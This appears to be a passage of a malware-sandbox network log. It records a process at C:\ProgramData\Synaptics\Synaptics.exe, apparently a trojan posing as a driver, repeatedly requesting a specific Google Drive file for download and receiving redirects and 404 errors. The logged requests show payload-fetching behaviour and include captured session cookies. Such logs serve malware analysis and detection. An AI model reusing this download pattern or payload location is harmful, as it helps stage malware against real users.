                                                                                                              2024-12-30 10:36:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 34 7a 70 51 79 55 4d 73 6f 66 78 51 32 48 41 58 4e 6c 5f 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="D4zpQyUMsofxQ2HAXNl_bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              25192.168.2.449779142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:02 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4SZkjsDejK4sGklkzysjFwPTw619WETp2riREnNCpzhuV6sGQ2pnoAEf48Ldojfk-oj_M534g
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:02 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-4WUBvEgZPEYkbPyfcWUU7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:02 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:02 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 62 43 70 34 4d 44 75 4c 4a 4a 4c 7a 56 56 5f 57 77 42 46 64 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="LbCp4MDuLJJLzVV_WwBFdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:02 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              26192.168.2.449781142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:02 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-34VZ4VTkHg0m3qB1bLAbmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              27192.168.2.449782142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:02 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-5MNABdwD4CA-n8I5Tv8mmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              28192.168.2.449783142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:02 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              29192.168.2.449784142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:02 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              30192.168.2.449788142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:03 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                                                                                              2024-12-30 10:36:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:03 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wAJebSsiLfhXNz8PXk0w7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              31192.168.2.449789142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:03 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E
                                                                                                              2024-12-30 10:36:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:03 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-WFb90VQPXRpG7uthKEC0cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              32192.168.2.449790142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:03 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4IOpqcoUwQYlR2jhkdNI5F_dXjfkV-KiFQmwfthSeR1SGdFk0kcgo6I8AG5IRcFXBb
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:03 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lyRGvNgpAlMTWpIKsVRDqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 30 73 70 34 38 6b 67 47 6c 50 64 65 41 6f 39 47 42 5f 57 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="x0sp48kgGlPdeAo9GB_W-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              33192.168.2.449791142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:03 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:04 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7ab4B4VViXexZXnNIsrUYjghqUgJysFZub8TKu0p9qi4tktUvGGypHgQu0w_TqLo5SAO61pHA
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:04 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YS8uuDpt5RQfQi7mOTB4oA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:04 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
